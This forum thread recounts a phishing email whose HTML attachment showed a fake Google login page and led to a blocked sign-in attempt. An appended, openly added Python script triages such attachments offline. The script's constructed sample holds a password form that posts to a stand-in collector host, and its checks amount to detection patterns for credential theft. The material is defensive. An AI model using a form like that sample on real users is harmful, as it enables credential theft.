
Posted (edited)

Yesterday I received an email from Addstore88 at gmail.com.

Addstore88 is an online website in Malaysia that sells Skyboxes and other electronic appliances, and I had contacted them about 6 months ago for a Skybox. At that time they had replied to me that they didn't have stock of the requested item, so they were more or less a trusted site for me. You can do a search for Addstore88 and you will find their website.

Yesterday I received an email with the subject RE: payment info, so I thought they informed me about the current stock.

The message read like, Please check payment info and confirm asap. Attached was an HTML file.

When I opened the file with Firefox I got to a Google page that asked me to login to my email. I logged in with another email than the one I received the message, and ended up in my inbox.

Next I saved the file and changed it to a TXT file so that I was able to open it with Notepad2, but the result was a large file with only digits.

I thought maybe they had sent a wrong file, but didn't reply because I don't need the item anymore.

This morning when I woke up there was a message in my email that Google had prevented a suspicious login to the email address I had used to view the message, about an hour after I had received the email.

The login had occurred from Malaysia :)

We prevented the sign-in attempt in case this was a hijacker trying to access your account. Please review the details of the sign-in attempt:

Monday, June 22, 3:19 AM GMT+8
IP Address: 124.82.28.219
Location: Puchong, Selangor, Malaysia

Edited by Anthony5
Posted

I hope you've changed that google email password, maybe even enabled 2-step authentication on the account if it's an important mail box.

Maybe their website or email account was compromised, and now someone's going through their old correspondence looking for wealthier marks.

Attack vectors are a changing.

Posted (edited)

I hope you've changed that google email password, maybe even enabled 2-step authentication on the account if it's an important mail box.

Maybe their website or email account was compromised, and now someone's going through their old correspondence looking for wealthier marks.

Attack vectors are a changing.

Yeah have changed my password straight away.

By the way, now you have 1 password for all your Google accounts.

Edit

Ooops, seems not.

Only the password from my main account was changed, and the one they tried to log in still has the same password. Changed now.

However I saw a message the other day that you could have a single password for all your google accounts. Will have to look it up.

Edited by Anthony5
Posted

Never click on links in emails without first checking where they lead.

It was no link, but an HTML file.

Some sites will enclose HTML-formatted documents because they're quicker to generate in the server-side code when you want to send someone a formatted invoice or notice.

One of the current attack vectors is emailing HTML with inline base64 binary files. No way to know what they are unless you open them up in an offline editor (or offline sandboxed browser).
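An offline way to inspect such an attachment without rendering it, as an added example that is not part of the original thread: the script parses the saved HTML as text and reports form targets, password fields, meta refreshes, inline base64 `data:` URIs and script bodies that are mostly digits (as in the first post). The sample input, the `collector.example` host and the thresholds are constructed assumptions.

```python
import base64, binascii, re
from html.parser import HTMLParser

DATA_URI = re.compile(r"data:([\w/+.-]*);base64,([A-Za-z0-9+/=]+)")

class AttachmentTriage(HTMLParser):
    """Collects risky features from an HTML attachment without rendering it."""
    def __init__(self):
        super().__init__()
        self.findings, self._in_script = [], False

    def _data_uris(self, text):
        for mime, blob in DATA_URI.findall(text):
            try:  # decode only to measure the payload; nothing is executed
                size = len(base64.b64decode(blob, validate=True))
            except binascii.Error:
                size = -1  # malformed base64 is still worth reporting
            self.findings.append(("data-uri", f"{mime or 'unknown'}:{size}"))

    def handle_starttag(self, tag, attrs):
        a = {k: v or "" for k, v in attrs}
        self._in_script = tag == "script"
        if tag == "form" and a.get("action"):
            self.findings.append(("form-action", a["action"]))  # where input would be sent
        if tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append(("password-field", a.get("name", "")))
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content", "")))
        for value in a.values():
            self._data_uris(value)

    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"

    def handle_data(self, data):
        if self._in_script:
            self._data_uris(data)
            digits = sum(c.isdigit() for c in data)
            if len(data) >= 100 and digits / len(data) >= 0.5:  # assumed thresholds
                self.findings.append(("digit-encoded-script", str(len(data))))

def triage(html_text):
    parser = AttachmentTriage()
    parser.feed(html_text)
    parser.close()
    return parser.findings

# Constructed sample, not the attachment from this thread.
_codes = ",".join(str(ord(c)) for c in "<p>constructed placeholder text for the triage example</p>")
_blob = base64.b64encode(b"constructed sample bytes").decode()
SAMPLE = ('<form action="https://collector.example/login"><input type="password" name="pw"></form>'
          f'<a href="data:application/octet-stream;base64,{_blob}">file</a><script>var d=[{_codes}];</script>')
```

Calling `triage(open(path, encoding="utf-8", errors="replace").read())` on a saved attachment returns a list of `(kind, detail)` pairs; an empty list means none of these features were found, not that the file is safe.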
